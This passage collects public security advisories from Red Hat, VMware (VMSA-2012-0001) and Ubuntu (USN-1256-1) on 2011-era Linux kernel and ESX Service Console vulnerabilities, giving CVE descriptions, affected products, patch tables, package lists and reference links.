  2. Multiple buffer overflow flaws were found in the Linux kernel's Management Module Support for Message Passing Technology (MPT) based controllers. (CVE-2011-1079, Moderate)

  3. Missing error checking in the way page tables were handled in the Xen hypervisor implementation could allow a privileged guest user to cause the host, and the guests, to lock up. (CVE-2011-1166, Moderate)

  4. A flaw was found in the way the Xen hypervisor implementation checked for the upper boundary when getting a new event channel port. (CVE-2011-1763, Moderate)

  5. The start_code and end_code values in "/proc/[pid]/stat" were not protected. (CVE-2011-1078, Low)

  6. A missing validation of a null-terminated string data structure element in the do_replace() function could allow a local user who has the CAP_NET_ADMIN capability to cause an information leak. (CVE-2011-1080, Low)

  7. A buffer overflow flaw in the DEC Alpha OSF partition implementation in the Linux kernel could allow a local attacker to cause an information leak by mounting a disk that contains specially-crafted partition tables. (CVE-2011-1163, Low)

  8. Missing validations of null-terminated string data structure elements in the do_replace(), compat_do_replace(), do_ipt_get_ctl(), do_ip6t_get_ctl(), and do_arpt_get_ctl() functions could allow a local user who has the CAP_NET_ADMIN capability to cause an information leak. (CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, Low)

  9. A heap overflow flaw in the Linux kernel's EFI GUID Partition Table (GPT) implementation could allow a local attacker to cause a denial of service by mounting a disk that contains specially-crafted partition tables. (CVE-2011-1577, Low)

Red Hat would like to thank Dan Rosenberg for reporting CVE-2011-1494 and CVE-2011-1495; Vasiliy Kulikov for reporting CVE-2011-1079, CVE-2011-1078, CVE-2011-1080, CVE-2011-1170, CVE-2011-1171, and CVE-2011-1172; Kees Cook for reporting CVE-2011-0726; and Timo Warns for reporting CVE-2011-1163 and CVE-2011-1577.

This update also fixes several bugs. Documentation for these bug fixes will be available shortly from the Technical Notes document linked to in the References section.

Users should upgrade to these updated packages, which contain backported patches to correct these issues, and fix the bugs noted in the Technical Notes. The system must be rebooted for this update to take effect. Solution:

Before applying this update, make sure all previously-released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):

681259 - CVE-2011-1078 kernel: bt sco_conninfo infoleak 681260 - CVE-2011-1079 kernel: bnep device field missing NULL terminator 681262 - CVE-2011-1080 kernel: ebtables stack infoleak 682954 - CVE-2011-1093 kernel: dccp: fix oops on Reset after close 684569 - CVE-2011-0726 kernel: proc: protect mm start_code/end_code in /proc/pid/stat 688021 - CVE-2011-1163 kernel: fs/partitions: Corrupted OSF partition table infoleak 688156 - [5.6][REG]for some uses of 'nfsservctl' system call, the kernel crashes. [rhel-5.6.z] 688579 - CVE-2011-1166 kernel: xen: x86_64: fix error checking in arch_set_info_guest() 689321 - CVE-2011-1170 ipv4: netfilter: arp_tables: fix infoleak to userspace 689327 - CVE-2011-1171 ipv4: netfilter: ip_tables: fix infoleak to userspace 689345 - CVE-2011-1172 ipv6: netfilter: ip6_tables: fix infoleak to userspace 689699 - Deadlock between device driver attachment and device removal with a USB device [rhel-5.6.z] 689700 - [NetApp 5.6 Bug] QLogic 8G FC firmware dumps seen during IO [rhel-5.6.z] 690134 - Time runs too fast in a VM on processors with > 4GHZ freq [rhel-5.6.z] 690239 - gfs2: creating large files suddenly slow to a crawl [rhel-5.6.z] 694021 - CVE-2011-1494 CVE-2011-1495 kernel: drivers/scsi/mpt2sas: prevent heap overflows 695976 - CVE-2011-1577 kernel: corrupted GUID partition tables can cause kernel oops 696136 - RHEL 5.6 (kernel -238) causes audio issues [rhel-5.6.z] 697448 - slab corruption after seeing some nfs-related BUG: warning [rhel-5.6.z] 699808 - dasd: fix race between open and offline [rhel-5.6.z] 701240 - CVE-2011-1763 kernel: xen: improper upper boundary check in get_free_port() function

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/kernel-2.6.18-238.12.1.el5.src.rpm

i386: kernel-2.6.18-238.12.1.el5.i686.rpm kernel-PAE-2.6.18-238.12.1.el5.i686.rpm kernel-PAE-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-PAE-devel-2.6.18-238.12.1.el5.i686.rpm kernel-debug-2.6.18-238.12.1.el5.i686.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-debug-devel-2.6.18-238.12.1.el5.i686.rpm kernel-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.i686.rpm kernel-devel-2.6.18-238.12.1.el5.i686.rpm kernel-headers-2.6.18-238.12.1.el5.i386.rpm kernel-xen-2.6.18-238.12.1.el5.i686.rpm kernel-xen-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-xen-devel-2.6.18-238.12.1.el5.i686.rpm

noarch: kernel-doc-2.6.18-238.12.1.el5.noarch.rpm

x86_64: kernel-2.6.18-238.12.1.el5.x86_64.rpm kernel-debug-2.6.18-238.12.1.el5.x86_64.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm kernel-debug-devel-2.6.18-238.12.1.el5.x86_64.rpm kernel-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.x86_64.rpm kernel-devel-2.6.18-238.12.1.el5.x86_64.rpm kernel-headers-2.6.18-238.12.1.el5.x86_64.rpm kernel-xen-2.6.18-238.12.1.el5.x86_64.rpm kernel-xen-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm kernel-xen-devel-2.6.18-238.12.1.el5.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/kernel-2.6.18-238.12.1.el5.src.rpm

i386: kernel-2.6.18-238.12.1.el5.i686.rpm kernel-PAE-2.6.18-238.12.1.el5.i686.rpm kernel-PAE-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-PAE-devel-2.6.18-238.12.1.el5.i686.rpm kernel-debug-2.6.18-238.12.1.el5.i686.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-debug-devel-2.6.18-238.12.1.el5.i686.rpm kernel-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.i686.rpm kernel-devel-2.6.18-238.12.1.el5.i686.rpm kernel-headers-2.6.18-238.12.1.el5.i386.rpm kernel-xen-2.6.18-238.12.1.el5.i686.rpm kernel-xen-debuginfo-2.6.18-238.12.1.el5.i686.rpm kernel-xen-devel-2.6.18-238.12.1.el5.i686.rpm

ia64: kernel-2.6.18-238.12.1.el5.ia64.rpm kernel-debug-2.6.18-238.12.1.el5.ia64.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.ia64.rpm kernel-debug-devel-2.6.18-238.12.1.el5.ia64.rpm kernel-debuginfo-2.6.18-238.12.1.el5.ia64.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.ia64.rpm kernel-devel-2.6.18-238.12.1.el5.ia64.rpm kernel-headers-2.6.18-238.12.1.el5.ia64.rpm kernel-xen-2.6.18-238.12.1.el5.ia64.rpm kernel-xen-debuginfo-2.6.18-238.12.1.el5.ia64.rpm kernel-xen-devel-2.6.18-238.12.1.el5.ia64.rpm

noarch: kernel-doc-2.6.18-238.12.1.el5.noarch.rpm

ppc: kernel-2.6.18-238.12.1.el5.ppc64.rpm kernel-debug-2.6.18-238.12.1.el5.ppc64.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm kernel-debug-devel-2.6.18-238.12.1.el5.ppc64.rpm kernel-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.ppc64.rpm kernel-devel-2.6.18-238.12.1.el5.ppc64.rpm kernel-headers-2.6.18-238.12.1.el5.ppc.rpm kernel-headers-2.6.18-238.12.1.el5.ppc64.rpm kernel-kdump-2.6.18-238.12.1.el5.ppc64.rpm kernel-kdump-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm kernel-kdump-devel-2.6.18-238.12.1.el5.ppc64.rpm

s390x: kernel-2.6.18-238.12.1.el5.s390x.rpm kernel-debug-2.6.18-238.12.1.el5.s390x.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.s390x.rpm kernel-debug-devel-2.6.18-238.12.1.el5.s390x.rpm kernel-debuginfo-2.6.18-238.12.1.el5.s390x.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.s390x.rpm kernel-devel-2.6.18-238.12.1.el5.s390x.rpm kernel-headers-2.6.18-238.12.1.el5.s390x.rpm kernel-kdump-2.6.18-238.12.1.el5.s390x.rpm kernel-kdump-debuginfo-2.6.18-238.12.1.el5.s390x.rpm kernel-kdump-devel-2.6.18-238.12.1.el5.s390x.rpm

x86_64: kernel-2.6.18-238.12.1.el5.x86_64.rpm kernel-debug-2.6.18-238.12.1.el5.x86_64.rpm kernel-debug-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm kernel-debug-devel-2.6.18-238.12.1.el5.x86_64.rpm kernel-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm kernel-debuginfo-common-2.6.18-238.12.1.el5.x86_64.rpm kernel-devel-2.6.18-238.12.1.el5.x86_64.rpm kernel-headers-2.6.18-238.12.1.el5.x86_64.rpm kernel-xen-2.6.18-238.12.1.el5.x86_64.rpm kernel-xen-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm kernel-xen-devel-2.6.18-238.12.1.el5.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2012-0001 Synopsis: VMware ESXi and ESX updates to third party library and ESX Service Console Issue date: 2012-01-30 Updated on: 2012-01-30 (initial advisory)

CVE numbers: --- COS Kernel --- CVE-2011-0726, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166, CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494, CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649, CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182, CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745, CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022, CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525, CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495, CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 --- COS cURL --- CVE-2011-2192 --- COS rpm --- CVE-2010-2059, CVE-2011-3378 --- COS samba --- CVE-2010-0547, CVE-2010-0787, CVE-2011-1678, CVE-2011-2522, CVE-2011-2694 --- COS python --- CVE-2009-3720, CVE-2010-3493, CVE-2011-1015, CVE-2011-1521 --- python library --- CVE-2009-3560, CVE-2009-3720, CVE-2010-1634, CVE-2010-2089, CVE-2011-1521


  1. Summary

VMware ESXi and ESX updates to third party library and ESX Service Console address several security issues.

  1. Relevant releases

ESXi 4.1 without patch ESXi410-201201401-SG

ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG, ESX410-201201407-SG

  1. Problem Description

a. ESX third party update for Service Console kernel

The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201401-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

b. ESX third party update for Service Console cURL RPM

The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201402-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

c. ESX third party update for Service Console nspr and nss RPMs

The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.

A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201404-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

d. ESX third party update for Service Console rpm RPMs

The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201406-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

e. ESX third party update for Service Console samba RPMs

The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.

Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201407-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

f. ESX third party update for Service Console python package

The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201201405-SG
ESX            4.0       ESX      patch pending
ESX            3.5       ESX      not applicable

* hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESXi update to third party component python

The python third party library is updated to python 2.5.6 which
fixes multiple security issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           5.0       ESXi     patch pending
ESXi           4.1       ESXi     ESXi410-201201401-SG
ESXi           4.0       ESXi     patch pending
ESXi           3.5       ESXi     patch pending

ESX            4.1       ESX      not affected
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected

* hosted products are VMware Workstation, Player, ACE, Fusion.
  1. Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware ESXi 4.1


ESXi410-201201401 http://downloads.vmware.com/go/selfsupport-download md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F http://kb.vmware.com/kb/2009143 ESXi410-201201401 contains ESXi410-201201401-SG

VMware ESX 4.1


ESX410-201201001 http://downloads.vmware.com/go/selfsupport-download md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC http://kb.vmware.com/kb/2009142

ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG, ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and ESX410-201201407-SG

  1. References

CVE numbers

--- COS Kernel --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901 --- COS cURL --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192 --- COS rpm --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378 --- COS samba --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694 --- COS python --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521 --- python library --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521


  1. Change log

2012-01-30 VMSA-2012-0001 Initial security advisory in conjunction with the release of patches for ESX 4.1 and ESXi 4.1 on 2012-01-30.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2012 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.8.3 (Build 4028) Charset: utf-8

wj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8 f2pLxi537s+ew4dvnYNWlJ8= =OAh4 -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-1256-1 November 09, 2011

linux-lts-backport-natty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 10.04 LTS

Summary:

Several security issues were fixed in the kernel.

Software Description: - linux-lts-backport-natty: Linux kernel backport from Natty

Details:

It was discovered that the /proc filesystem did not correctly handle permission changes when programs executed. A local attacker could hold open files to examine details about programs running with higher privileges, potentially increasing the chances of exploiting additional vulnerabilities. (CVE-2011-1020)

Vasiliy Kulikov discovered that the Bluetooth stack did not correctly clear memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2011-1078)

Vasiliy Kulikov discovered that the Bluetooth stack did not correctly check that device name strings were NULL terminated. A local attacker could exploit this to crash the system, leading to a denial of service, or leak contents of kernel stack memory, leading to a loss of privacy. (CVE-2011-1079)

Vasiliy Kulikov discovered that bridge network filtering did not check that name fields were NULL terminated. A local attacker could exploit this to leak contents of kernel stack memory, leading to a loss of privacy. (CVE-2011-1080)

Johan Hovold discovered that the DCCP network stack did not correctly handle certain packet combinations. A remote attacker could send specially crafted network traffic that would crash the system, leading to a denial of service. (CVE-2011-1093)

Peter Huewe discovered that the TPM device did not correctly initialize memory. A local attacker could exploit this to read kernel heap memory contents, leading to a loss of privacy. (CVE-2011-1160)

Dan Rosenberg discovered that the IRDA subsystem did not correctly check certain field sizes. If a system was using IRDA, a remote attacker could send specially crafted traffic to crash the system or gain root privileges. (CVE-2011-1180)

Ryan Sweat discovered that the GRO code did not correctly validate memory. In some configurations on systems using VLANs, a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2011-1478)

It was discovered that the security fix for CVE-2010-4250 introduced a regression. A remote attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-1479)

Dan Rosenberg discovered that the X.25 Rose network stack did not correctly handle certain fields. If a system was running with Rose enabled, a remote attacker could send specially crafted traffic to gain root privileges. (CVE-2011-1493)

It was discovered that the Stream Control Transmission Protocol (SCTP) implementation incorrectly calculated lengths. If the net.sctp.addip_enable variable was turned on, a remote attacker could send specially crafted traffic to crash the system. (CVE-2011-1573)

Ryan Sweat discovered that the kernel incorrectly handled certain VLAN packets. On some systems, a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2011-1576)

Timo Warns discovered that the GUID partition parsing routines did not correctly validate certain structures. A local attacker with physical access could plug in a specially crafted block device to crash the system, leading to a denial of service. (CVE-2011-1577)

Phil Oester discovered that the network bonding system did not correctly handle large queues. On some systems, a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2011-1581)

It was discovered that CIFS incorrectly handled authentication. When a user had a CIFS share mounted that required authentication, a local user could mount the same share without knowing the correct password. (CVE-2011-1585)

It was discovered that the GRE protocol incorrectly handled netns initialization. A remote attacker could send a packet while the ip_gre module was loading, and crash the system, leading to a denial of service. (CVE-2011-1767)

It was discovered that the IP/IP protocol incorrectly handled netns initialization. A remote attacker could send a packet while the ipip module was loading, and crash the system, leading to a denial of service. (CVE-2011-1768)

Ben Greear discovered that CIFS did not correctly handle direct I/O. A local attacker with access to a CIFS partition could exploit this to crash the system, leading to a denial of service. (CVE-2011-1771)

Timo Warns discovered that the EFI GUID partition table was not correctly parsed. A physically local attacker that could insert mountable devices could exploit this to crash the system or possibly gain root privileges. (CVE-2011-1776)

Vasiliy Kulikov and Dan Rosenberg discovered that ecryptfs did not correctly check the origin of mount points. A local attacker could exploit this to trick the system into unmounting arbitrary mount points, leading to a denial of service. (CVE-2011-1833)

Andrea Righi discovered a race condition in the KSM memory merging support. If KSM was being used, a local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2183)

Dan Rosenberg discovered that the IPv4 diagnostic routines did not correctly validate certain requests. A local attacker could exploit this to consume CPU resources, leading to a denial of service. (CVE-2011-2213)

It was discovered that an mmap() call with the MAP_PRIVATE flag on "/dev/zero" was incorrectly handled. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2479)

Vasiliy Kulikov discovered that taskstats listeners were not correctly handled. A local attacker could expoit this to exhaust memory and CPU resources, leading to a denial of service. (CVE-2011-2484)

Vasily Averin discovered that the NFS Lock Manager (NLM) incorrectly handled unlock requests. A local attacker could exploit this to cause a denial of service. (CVE-2011-2491)

It was discovered that Bluetooth l2cap and rfcomm did not correctly initialize structures. A local attacker could exploit this to read portions of the kernel stack, leading to a loss of privacy. (CVE-2011-2492)

Sami Liedes discovered that ext4 did not correctly handle missing root inodes. A local attacker could trigger the mount of a specially crafted filesystem to cause the system to crash, leading to a denial of service. (CVE-2011-2493)

Vasiliy Kulikov discovered that taskstats did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2494)

Vasiliy Kulikov discovered that /proc/PID/io did not enforce access restrictions. A local attacker could exploit this to read certain information, leading to a loss of privacy. (CVE-2011-2495)

Robert Swiecki discovered that mapping extensions were incorrectly handled. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2496)

Dan Rosenberg discovered that the Bluetooth stack incorrectly handled certain L2CAP requests. If a system was using Bluetooth, a remote attacker could send specially crafted traffic to crash the system or gain root privileges. (CVE-2011-2497)

It was discovered that the wireless stack incorrectly verified SSID lengths. A local attacker could exploit this to cause a denial of service or gain root privileges. (CVE-2011-2517)

Ben Pfaff discovered that Classless Queuing Disciplines (qdiscs) were being incorrectly handled. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2525)

It was discovered that GFS2 did not correctly check block sizes. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2689)

It was discovered that the EXT4 filesystem contained multiple off-by-one flaws. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2695)

Fernando Gont discovered that the IPv6 stack used predictable fragment identification numbers. A remote attacker could exploit this to exhaust network resources, leading to a denial of service. (CVE-2011-2699)

Mauro Carvalho Chehab discovered that the si4713 radio driver did not correctly check the length of memory copies. If this hardware was available, a local attacker could exploit this to crash the system or gain root privileges. (CVE-2011-2700)

Herbert Xu discovered that certain fields were incorrectly handled when Generic Receive Offload (CVE-2011-2723)

Christian Ohm discovered that the perf command looks for configuration files in the current directory. If a privileged user were tricked into running perf in a directory containing a malicious configuration file, an attacker could run arbitrary commands and possibly gain privileges. (CVE-2011-2905)

Vasiliy Kulikov discovered that the Comedi driver did not correctly clear memory. A local attacker could exploit this to read kernel stack memory, leading to a loss of privacy. (CVE-2011-2909)

The performance counter subsystem did not correctly handle certain counters. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2918)

Time Warns discovered that long symlinks were incorrectly handled on Be filesystems. A local attacker could exploit this with a malformed Be filesystem and crash the system, leading to a denial of service. (CVE-2011-2928)

Qianfeng Zhang discovered that the bridge networking interface incorrectly handled certain network packets. A remote attacker could exploit this to crash the system, leading to a denial of service. (CVE-2011-2942)

Dan Kaminsky discovered that the kernel incorrectly handled random sequence number generation. An attacker could use this flaw to possibly predict sequence numbers and inject packets. (CVE-2011-3188)

Darren Lavender discovered that the CIFS client incorrectly handled certain large values. (CVE-2011-3191)

Yasuaki Ishimatsu discovered a flaw in the kernel's clock implementation. A local unprivileged attacker could exploit this causing a denial of service. (CVE-2011-3209)

Yogesh Sharma discovered that CIFS did not correctly handle UNCs that had no prefixpaths. A local attacker with access to a CIFS partition could exploit this to crash the system, leading to a denial of service. (CVE-2011-3363)

Update instructions:

